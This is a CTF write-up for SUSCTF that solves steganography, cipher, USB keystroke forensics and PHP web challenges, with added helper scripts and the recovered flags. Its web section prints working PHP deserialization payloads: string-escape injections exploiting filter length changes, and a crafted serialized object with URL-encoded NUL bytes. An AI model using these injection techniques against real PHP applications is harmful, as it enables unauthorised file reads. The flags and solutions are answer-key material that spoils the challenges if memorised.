Preface

By the time I got the account there was only half a day left, so I worked through some challenges on and off. Some web challenge environments were shut down before I could reproduce them; see you on BUU.

MISC

Sign-in

SUSCTF{Welcome_t0_SUSCTF}

Survey

SUSCTF{Thank_y0u_fOr_your_r3ply}

Brute-force genius asks to join the battle

Stage 1: mask brute force

[screenshots]

Stage 2: LSB steganography

[screenshot]

Stage 3: rail fence cipher

S{urgdt1}UY_30__sS0a_04mc

[screenshot]

SUS{Y0u_ar3_g00d_4t_m1sc}
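As an added example (not part of the original writeup), the decoding of this stage in Python. The "rail fence" produced by the usual Chinese CTF tools is the column-split variant rather than the zigzag one: the plaintext is written in rows of N characters and read column by column, which the ciphertext above confirms (encrypting the flag with N = 3 reproduces it exactly). Since N is not given, the helper also brute-forces it and keeps every rail count whose output looks like a flag.

```python
def rail_fence_encrypt(plaintext, rails):
    """Column-split rail fence: every rails-th character, starting at offsets 0..rails-1."""
    return "".join(plaintext[r::rails] for r in range(rails))


def rail_fence_decrypt(ciphertext, rails):
    """Inverse of rail_fence_encrypt: the first n % rails columns hold one extra char."""
    n = len(ciphertext)
    base, extra = divmod(n, rails)
    cols, pos = [], 0
    for r in range(rails):
        size = base + (1 if r < extra else 0)
        cols.append(ciphertext[pos:pos + size])
        pos += size
    # character i of the plaintext sits in column i % rails at row i // rails
    return "".join(cols[i % rails][i // rails] for i in range(n))


def find_rails(ciphertext, prefix="SUS{", suffix="}"):
    """Brute-force the rail count: return every value whose output looks like a flag."""
    hits = []
    for rails in range(2, len(ciphertext)):
        candidate = rail_fence_decrypt(ciphertext, rails)
        if candidate.startswith(prefix) and candidate.endswith(suffix):
            hits.append(rails)
    return hits


if __name__ == "__main__":
    ct = "S{urgdt1}UY_30__sS0a_04mc"   # the ciphertext quoted above
    for rails in find_rails(ct):
        print(rails, rail_fence_decrypt(ct, rails))
```

Only one rail count (3) yields a string that starts with `SUS{` and ends with `}`; checking both ends is enough to reject the other 22 candidates without reading them.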

Sign-in: official account

SUSCTF{W3lc0m3_t0_SUSCTF}

Dance_Dance

Stage 1: dancing men cipher

[screenshot]

Match the figures against an online table; a man holding a flag marks the end of a word.

[screenshot]

passwdLetU sdanCe

Stage 2: extract with binwalk

[screenshot]

Archive password: LetUsdanCe

Stage 3: QR code in the audio spectrogram

[screenshot]

In the end I drew it out by hand.

[screenshot]

SUS{1nt3r35t1nG_5p3ctRum}

ƃɐlɟ¯ʇuᴉɹԀ

Reverse the hex data to get a zip.

The zip contains a txt and an encrypted archive; run character-frequency analysis on the txt.

[screenshot]

Mima (password): D0youkNOw3dpr1nt?

According to the file contents it was generated with Cura_SteamEngine 4.6.2.

That needs hardware I don't have, so I'm out.

[萌] Are you OK?

Decode the Ook! cipher on an online site.

[screenshot]

Ar3_y0u_OK??

Extracting the archive gives an image; the hint says it is not tall enough, so raise the height field in WinHex.

[screenshot]

SUS{wuhu_y0u_f1nD_m3}

[萌]fix_fo

Drag it into WinHex and repair the file header.

[screenshot]

Extracting gives a 新佛曰 (New Buddha Says) cipher:

新佛曰:諸隸殿僧降殿吽殿諸陀摩隸僧缽薩殿願心殿薩殿咤伏殿聞莊摩咤殿諦殿如叻須降闍殿亦修我殿愍殿諸隸殿波如空殿如如囑囑殿
[screenshot]

SUS{Ta1k_w1th_F0}

Catch that little mouse

Stage 1: zip pseudo-encryption; only one of the archives is pseudo-encrypted.

[screenshot]

Extracting gives a keyboard traffic capture; a quick look shows USB HID keyboard reports (8 bytes each: modifier byte, reserved byte, then the pressed keycodes):

00:00:13:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:12:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:15:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:07:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00
00:00:00:00:00:00:00:00
02:00:00:00:00:00:00:00
02:00:33:00:00:00:00:00
02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:18:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:22:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0e:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:21:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:15:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1e:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:05:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:18:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:11:00:00:00:00:00
00:00:00:00:00:00:00:00
[screenshot]

Decoded keystrokes: password : l3t-u5-l00k-4t-th3-r1ght-butt0n (the 02:00:33 report is Shift plus ';', i.e. ':', and 0x2c is Space), so the password is l3t-u5-l00k-4t-th3-r1ght-butt0n
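Decoding those reports by hand is error-prone, so here is an added Python decoder (not part of the original writeup). A USB boot-keyboard report is 8 bytes: byte 0 holds the modifier bits (0x02 and 0x20 are left and right Shift), byte 1 is reserved, bytes 2..7 hold up to six pressed keycodes from the HID usage table. A key is emitted only when it first appears in a report, so the all-zero release reports and held keys are handled correctly, and Backspace (0x2a) removes the previous character. The embedded sample is the first 27 reports of the capture above (constructed as a string here); running the function over all 86 gives "password : l3t-u5-l00k-4t-th3-r1ght-butt0n".

```python
# Partial USB HID keyboard usage table: keycode -> (unshifted, shifted).
KEYMAP = {0x04 + i: (chr(0x61 + i), chr(0x41 + i)) for i in range(26)}        # a-z
KEYMAP.update({0x1E + i: pair for i, pair in enumerate(zip("1234567890", "!@#$%^&*()"))})
KEYMAP.update({
    0x28: ("\n", "\n"), 0x2B: ("\t", "\t"), 0x2C: (" ", " "),
    0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"), 0x30: ("]", "}"),
    0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'), 0x35: ("`", "~"),
    0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})
BACKSPACE = 0x2A
SHIFT_MASK = 0x22          # bit 1 = left shift, bit 5 = right shift


def decode_hid_keystrokes(lines):
    """Turn colon-separated 8-byte HID reports (one per line) into the typed text."""
    typed = []
    held = set()                       # keycodes that were down in the previous report
    for line in lines:
        line = line.strip()
        if not line:
            continue
        report = bytes.fromhex(line.replace(":", ""))
        if len(report) != 8:
            raise ValueError(f"not an 8-byte boot-keyboard report: {line!r}")
        shifted = bool(report[0] & SHIFT_MASK)
        pressed = {k for k in report[2:8] if k}
        for key in sorted(pressed - held):   # only newly pressed keys produce output
            if key == BACKSPACE:
                if typed:
                    typed.pop()
            elif key in KEYMAP:
                typed.append(KEYMAP[key][1 if shifted else 0])
            # unmapped usages (Caps Lock, arrows, F-keys, ...) are ignored
        held = pressed
    return "".join(typed)


# Constructed sample: the first 27 reports of the capture quoted above.
SAMPLE = """\
00:00:13:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:12:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:15:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:07:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00
00:00:00:00:00:00:00:00
02:00:00:00:00:00:00:00
02:00:33:00:00:00:00:00
02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:20:00:00:00:00:00
"""

if __name__ == "__main__":
    print(decode_hid_keystrokes(SAMPLE.splitlines()))
```

Feed it the `usb.capdata` / `usbhid.data` column exported from the pcap, one report per line; reports from other devices on the bus (mouse, hub) will not be 8 bytes and are rejected rather than silently misread.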

It wouldn't open that archive, I'm done.

Emoji are fun

Judging by the filename it is a JPEG hidden with JPHS, and the password is in the emoji:

💸😲📓📓📀📧📰😫🐖👹🐛😫😥🐍📬📧😃🐡

It can be decoded with a script from GitHub.

[screenshot]

password:C0de3moj1

Use the password to extract the hidden data from the image.

[screenshot]

This gives a 0/1 string; the filename says to draw it, so the guess is that the bits form a QR code.

Its length is a perfect square, 245*245, so it is a 245x245 image; a script turns it into the QR code.

[screenshot]

SUS{1p0ch_wanNA_4_npy5}
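The rendering step, as an added example (not the script the author used): the 0/1 string is reshaped into a square and written as a plain PBM image, a text format that needs no imaging library. Two details matter for a scanner: each module is scaled up to several pixels, and a four-module white quiet zone is added around the code, as the QR specification requires. If the result does not scan, bit polarity is the usual culprit and `invert=True` flips it. The 3x3 pattern in the usage section is constructed, not the challenge's data.

```python
import math


def bits_to_pbm(bits, scale=4, border=4, invert=False):
    """Render a 0/1 string as a plain (P1) PBM. A '1' is drawn as a black module.

    bits   : string of '0'/'1' (other characters such as newlines are dropped)
    scale  : pixels per QR module; scanners want at least 3-4
    border : quiet zone in modules (the QR spec asks for 4)
    invert : swap black and white if the decoder rejects the result
    """
    bits = "".join(ch for ch in bits if ch in "01")
    side = math.isqrt(len(bits))
    if side * side != len(bits):
        raise ValueError(f"{len(bits)} bits is not a perfect square; the string is truncated or padded")
    if invert:
        bits = bits.translate(str.maketrans("01", "10"))
    grid = [bits[y * side:(y + 1) * side] for y in range(side)]
    pad = "0" * border
    blank = "0" * (side + 2 * border)
    padded = [blank] * border + [pad + row + pad for row in grid] + [blank] * border
    out_side = (side + 2 * border) * scale
    lines = []
    for row in padded:
        scaled = " ".join(ch for ch in row for _ in range(scale))   # stretch horizontally
        lines.extend([scaled] * scale)                               # and vertically
    return f"P1\n{out_side} {out_side}\n" + "\n".join(lines) + "\n"


def write_pbm(bits, path, **kwargs):
    """Write the image; open it with any viewer or feed it to a QR decoder."""
    with open(path, "w") as fh:
        fh.write(bits_to_pbm(bits, **kwargs))


if __name__ == "__main__":
    # constructed 3x3 checkerboard, not the challenge's 245x245 string
    write_pbm("101010101", "qr.pbm", scale=8)
```

The length check is the useful part: a 0/1 string that is one character short (a dropped newline, a copy-paste slip) silently shifts every row by one and produces a QR-looking image that never decodes, so failing early on a non-square length saves a lot of squinting.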

Little Bear, why are you wearing Pinru's mask?

It looks like the idea is to do forensics on the ISO first, then use the recovered password to decrypt with EncryptoforWin.

CRYPTO

[Easy] 嘤语 (emoji English)

Little Z intercepted an encrypted conversation on a certain site:
😳😊⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐🔑⬜🤣⬜😇😠🤣🤪🤪😳😇🤣😠⬜😇😳😖🥺😍😏⬜😳🤪⬜🤣⬜😋🤐😖😍⬜🤩😆⬜😇😳😖🥺😍😏⬜😋🥺🤣😋⬜😴🤣🤪⬜😘🤪😍🙃⬜🥺😳🤪😋🤩😏😳😇🤣😠😠🤐⬜😅😘😋⬜😊🤩😴⬜🥺🤣🤪⬜😆🤣😠😠😍😊🔑⬜😆🤩😏⬜😋🥺😍⬜😭🤩🤪😋⬜😖🤣😏😋🔑⬜😳😊😋🤩⬜🙃😳🤪😘🤪😍⭕⬜😳😊⬜😇🤩😊😋😏🤣🤪😋⬜😋🤩⬜😭🤩🙃😍😏😊⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺😳😇⬜🤣😠🧐🤩😏😳😋🥺😭🤪🔑⬜😭🤩🤪😋⬜😇😠🤣🤪🤪😳😇🤣😠⬜😇😳😖🥺😍😏🤪⬜😇🤣😊⬜😅😍⬜😖😏🤣😇😋😳😇🤣😠😠🤐⬜😇🤩😭😖😘😋😍🙃⬜🤣😊🙃⬜🤪🤩😠😮😍🙃⬜😅🤐⬜🥺🤣😊🙃⭕⬜🥺🤩😴😍😮😍😏🔑⬜😋🥺😍🤐⬜🤣😏😍⬜🤣😠🤪🤩⬜😘🤪😘🤣😠😠🤐⬜😮😍😏🤐⬜🤪😳😭😖😠😍⬜😋🤩⬜😅😏😍🤣😷⬜😴😳😋🥺⬜😭🤩🙃😍😏😊⬜😋😍😇🥺😊🤩😠🤩🧐🤐⭕⬜😋🥺😍⬜😋😍😏😭⬜😳😊😇😠😘🙃😍🤪⬜😋🥺😍⬜🤪😳😭😖😠😍⬜🤪🤐🤪😋😍😭🤪⬜😘🤪😍🙃⬜🤪😳😊😇😍⬜🧐😏😍😍😷⬜🤣😊🙃⬜😏🤩😭🤣😊⬜😋😳😭😍🤪🔑⬜😋🥺😍⬜😍😠🤣😅🤩😏🤣😋😍⬜😏😍😊🤣😳🤪🤪🤣😊😇😍⬜😇😳😖🥺😍😏🤪🔑⬜😴🤩😏😠🙃⬜😴🤣😏⬜😳😳⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐⬜🤪😘😇🥺⬜🤣🤪⬜😋🥺😍⬜😍😊😳🧐😭🤣⬜😭🤣😇🥺😳😊😍⬜🤣😊🙃⬜😅😍🤐🤩😊🙃⭕⬜🥺😍😏😍⬜😳🤪⬜🤐🤩😘😏⬜😆😠🤣🧐☯⬜🤪😘🤪😇😋😆🌘😍🤣🤪🤐⛔😏😍😖😠🤣😇😍⛔😇😏🤐😖😋🤩🌒⭕
After many attempts, Little Z barely recovered a few special characters:
⭕ => .
☯ => :
🔑 => ,
⛔ => _
🌘 => {
🌒 => }
Can you help him?
Note: the flag is entirely uppercase

I found a site with a decoding table, but it isn't needed for this one; it is solved purely by guessing English. For instance, the last segment should be the flag:

🤪😘🤪😇😋😆
SUSCTF
🌘😍🤣🤪🤐⛔😏😍😖😠🤣😇😍⛔😇😏🤐😖😋🤩🌒
SUSCTF{**S*_*****C*_C***T*}

Next, common English words such as THE and IS, guessed from the emoji already known and the sense of the sentences:

😋🥺😍
THE
😳🤪
IS
😆😠🤣🧐☯
FLAG:
😋🥺😍🤐
THEY
😋🤐😖😍
TYPE

The two letters still missing, 😏 and 🤩, both occur in 😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐, which with the letters above reads C?YPT?G?APHY, i.e. CRYPTOGRAPHY, so 😏 = R and 🤩 = O. Updated flag:
SUSCTF{EASY_REPLACE_CRYPTO}
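Added Python to make the guessing systematic (not part of the original solution): each crib, a ciphertext segment paired with the English it is believed to spell, is folded into one key, and a contradiction between cribs raises instead of silently overwriting an earlier guess. The key is then applied to the whole message with unsolved symbols shown as `*`, which is the same partial view as the `SUSCTF{**S*_...}` line above. The cribs are the ones in the text plus one assumption of mine: that 😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐 is CRYPTOGRAPHY (it supplies R and O); ⬜ as the word separator is likewise an assumption.

```python
from collections import Counter

# Punctuation recovered in the challenge statement; ⬜ as space is an assumption.
PUNCT = {"⭕": ".", "☯": ":", "🔑": ",", "⛔": "_", "🌘": "{", "🌒": "}", "⬜": " "}


def key_from_cribs(cribs, base=None):
    """Fold (ciphertext_segment, plaintext_segment) pairs into one substitution key.

    Raises ValueError if a symbol would have to stand for two different letters,
    which is the fastest way to notice that a crib is wrong.
    """
    key = dict(base or {})
    for ct, pt in cribs:
        if len(ct) != len(pt):
            raise ValueError(f"crib length mismatch: {ct!r} vs {pt!r}")
        for c, p in zip(ct, pt):
            if key.get(c, p) != p:
                raise ValueError(f"{c} already maps to {key[c]}, crib says {p}")
            key[c] = p
    return key


def apply_key(ciphertext, key, unknown="*"):
    """Decode with a partial key; symbols not yet solved are shown as `unknown`."""
    return "".join(key.get(c, unknown) for c in ciphertext)


def symbol_frequencies(ciphertext, key):
    """Counts of the symbols that are still unsolved, most frequent first."""
    return Counter(c for c in ciphertext if c not in key).most_common()


CRIBS = [
    ("🤪😘🤪😇😋😆", "SUSCTF"),
    ("😋🥺😍", "THE"),
    ("😳🤪", "IS"),
    ("😆😠🤣🧐☯", "FLAG:"),
    ("😋🥺😍🤐", "THEY"),
    ("😋🤐😖😍", "TYPE"),
    ("😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐", "CRYPTOGRAPHY"),   # assumed crib, see lead-in
]
KEY = key_from_cribs(CRIBS, PUNCT)
FLAG_SEGMENT = "🤪😘🤪😇😋😆🌘😍🤣🤪🤐⛔😏😍😖😠🤣😇😍⛔😇😏🤐😖😋🤩🌒"


def solve_flag():
    return apply_key(FLAG_SEGMENT, KEY)


if __name__ == "__main__":
    print(solve_flag())
```

To work on the full message, paste the ciphertext from the statement into `apply_key`, then call `symbol_frequencies` on it: the most frequent unsolved symbol is almost always E, T, A or O, which is how the THE / IS guesses are confirmed rather than hoped for.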

WEB

Sign_in

Intercept the request and resubmit it as a POST with the parameter.

[screenshot]

SUSCTF{397d79b4fd5bb85d73d86742dfdf223d}

AT_Field

Change the number of characters the input field allows, type flag and submit.

[screenshot]

SUSCTF{0e808712e2a814fe0cd126e09159226a}

Script_Kiddle

Capture a request and brute-force it; it takes some luck.

[screenshot]

SUSCTF{24bf10b0f61c19e10a631e4c603127b2}

first_lesson

<?php
highlight_file(__FILE__);
if (isset($_GET["z33"]))
{
echo "<p>z33 is " . $_GET['z33'] . "</p>";
if ($_GET["z33"] === "feiwu")
{
if (isset($_GET["rmb"]))
{
echo "<p>rmb is " . $_GET["rmb"] . "</p>";
if ($_GET["rmb"] === "shenxian")
{
if (isset($_POST["aa"]))
{
echo "<p>aa is dage of " . $_POST["aa"] . "</p>";
if ($_POST["aa"] === "z33&rmb")
{
echo file_get_contents("/flag");
}
}
else
{
echo "<p>use POST method to submit aa</p>";
}
}
}
else
{
echo "<p>use GET method to submit rmb</p>";
}
}
}
else
{
echo "<p>use GET method to submit z33</p>";
}
[screenshot]

SUSCTF{so_who_is_AA}
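The one thing that trips people up here is the required value `z33&rmb`: sent raw in the POST body, the `&` splits it into two parameters. As an added example (not the author's code), a Python port of the page's decision logic together with a model of how PHP fills `$_POST` (split on `&` first, percent-decode second), showing the encoded body succeeding and the raw one failing. The `<contents of /flag>` string is a stand-in for the real file_get_contents("/flag") output.

```python
from urllib.parse import parse_qs, urlencode


def php_request_vars(query):
    """Model of how PHP fills $_GET / $_POST: split on '&' first, percent-decode second."""
    return {key: values[0] for key, values in parse_qs(query, keep_blank_values=True).items()}


def first_lesson(get, post):
    """Port of the challenge's decision logic; returns the last message the page prints."""
    if "z33" not in get:
        return "use GET method to submit z33"
    if get["z33"] != "feiwu":
        return f"z33 is {get['z33']}"
    if "rmb" not in get:
        return "use GET method to submit rmb"
    if get["rmb"] != "shenxian":
        return f"rmb is {get['rmb']}"
    if "aa" not in post:
        return "use POST method to submit aa"
    if post["aa"] != "z33&rmb":
        return f"aa is dage of {post['aa']}"
    return "<contents of /flag>"            # stand-in for file_get_contents("/flag")


def build_request():
    """Query string and POST body that satisfy all three checks."""
    query = urlencode({"z33": "feiwu", "rmb": "shenxian"})
    body = urlencode({"aa": "z33&rmb"})       # the '&' must travel as %26
    return query, body


def submit(query, body):
    """What the server would answer to this query string and body."""
    return first_lesson(php_request_vars(query), php_request_vars(body))


if __name__ == "__main__":
    query, body = build_request()
    print(body)                               # aa=z33%26rmb
    print(submit(query, body))
    print(submit(query, "aa=z33&rmb"))        # raw '&' splits the body into aa=z33 and rmb=
```

With curl the same encoding is `--data-urlencode 'aa=z33&rmb'`; `-d 'aa=z33&rmb'` sends the raw ampersand and lands on the "aa is dage of z33" branch.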

刀来! (Bring the knife!)

[screenshot]

SUSCTF{f5f397a37b728d927576ae889b908d17}

Ez_escape1

<?php
highlight_file(__file__);
$name=$_POST["name"];
$number=10086;
class escape
{
public $name;
public $number;
public function __construct($name,$number)
{
$this->name=$name;
$this->number=$number;
}
}
function filter($string){
return str_replace('nzgnb','nzgyyds',$string);
}
$epoch=filter(serialize(new escape($name,$number)));
echo $epoch."<br>";
$ep0ch=unserialize($epoch);
if($ep0ch->number===1008611) {
echo base64_encode(file_get_contents("/flag"));
}
else{
echo "try again";
}

Each nzgnb becomes nzgyyds, 2 bytes longer, while the declared string length stays the same, so every copy pushes 2 bytes of our own data out of the string. The fragment to inject, ";s:6:"number";i:1008611;}, is 26 bytes, so name = 13 copies of nzgnb followed by that fragment. The filtered output (the original `;s:6:"number";i:10086;}` is left dangling after the closing brace and ignored) and the decoded flag:

O:6:"escape":2:{s:4:"name";s:91:"nzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyyds";s:6:"number";i:1008611;}";s:6:"number";i:10086;}
U1VTQ1RGe2MyYmQyOWRiNDk1N2JmODBjM2M5OWRlMTliZDRhNjBkfQ==

SUSCTF{c2bd29db4957bf80c3c99de19bd4a60d}

Ez_escape2

<?php
highlight_file(__file__);
$haidilao=$_POST["haidilao"];
$core=$_POST["core"];
$num="2019";
class escape2
{
public $haidilao;
public $core;
public $num;
public function __construct($haidilao,$core,$num)
{
$this->haidilao=$haidilao;
$this->core=$core;
$this->num=$num;
}
public function __wakeup()
{
if($this->num==="2020") {
echo base64_encode(file_get_contents("/flag"));
}
else{
echo "try again";
}

}
}

function filter($string){
return str_replace('Haidilao','Hedilao',$string);
}
$btis=filter(serialize(new escape2($haidilao,$core,$num)));
echo "<br>".$btis."<br>";
$bt15=unserialize($btis);

Here the filter makes the string shorter (Haidilao -> Hedilao loses one byte per copy), so the payload goes into the string that follows haidilao, namely core: the parser reads past the end of the shortened haidilao value, swallows the bytes up to the start of core's value, and then parses the contents of core as real properties.

O:7:"escape2":3:{s:8:"haidilao";s:8:"Hedilao";s:4:"core";s:1:"1";s:3:"num";s:4:"2019";} # normal serialized string (already filtered)
";s:4:"core";s:1:" # the characters that must be swallowed
";s:4:"core";s:1:"1";s:3:"num";s:4:"2020";} # the value to send as core

With the core value actually used below, ";s:4:"core";s:3:"123";s:3:"num";s:4:"2020";}, which is 45 bytes, the prefix to swallow is ";s:4:"core";s:45:" (the length field has two digits), 19 characters in total, so send 19 copies of Haidilao. After the replacement the haidilao string is 19 bytes short, the parser consumes exactly that prefix, and core then supplies core and num (=== "2020") itself; the original ";s:3:"num";s:4:"2019";} is left after the closing brace and ignored.

haidilao=HaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilao&core=";s:4:"core";s:3:"123";s:3:"num";s:4:"2020";}

AA_is_who

<?php
highlight_file(__FILE__);
class AA
{
public $name;
protected $power;
public function __destruct()
{
if($this->name === "Aryb1n")
{
echo "AA is Aryb1n";
if($this->power > 100000)
{
echo "AA is powerful";
echo file_get_contents("/flag");
}
else
{
echo "AA is not so weak";
}
}
else
{
echo "who is AA?";
}
}
}
// maybe you should consider URL encode?
$aa = $_GET["aa"];
unserialize($aa);

aa is taken from GET; the destructor wants $name === "Aryb1n" and $power > 100000, so serialize an object with those values. $power is protected, so PHP serializes its name as \0*\0power (8 bytes including two NUL bytes); the NULs must reach the server as %00, either by padding them in by hand or, simpler, by URL-encoding the whole serialized string:

<?php
class AA{
    public $name="Aryb1n";      // must be quoted: a bare Aryb1n is an undefined constant
    protected $power=1000000;   // any value > 100000 works
}
$a=new AA();
print serialize($a);
print urlencode(serialize($a));
?>
//O:2:"AA":2:{s:4:"name";s:6:"Aryb1n";s:8:"\0*\0power";i:1000000;}   (the two NUL bytes around * are invisible when printed, hence s:8)
//O%3A2%3A%22AA%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A6%3A%22Aryb1n%22%3Bs%3A8%3A%22%00%2A%00power%22%3Bi%3A1000000%3B%7D
[screenshot]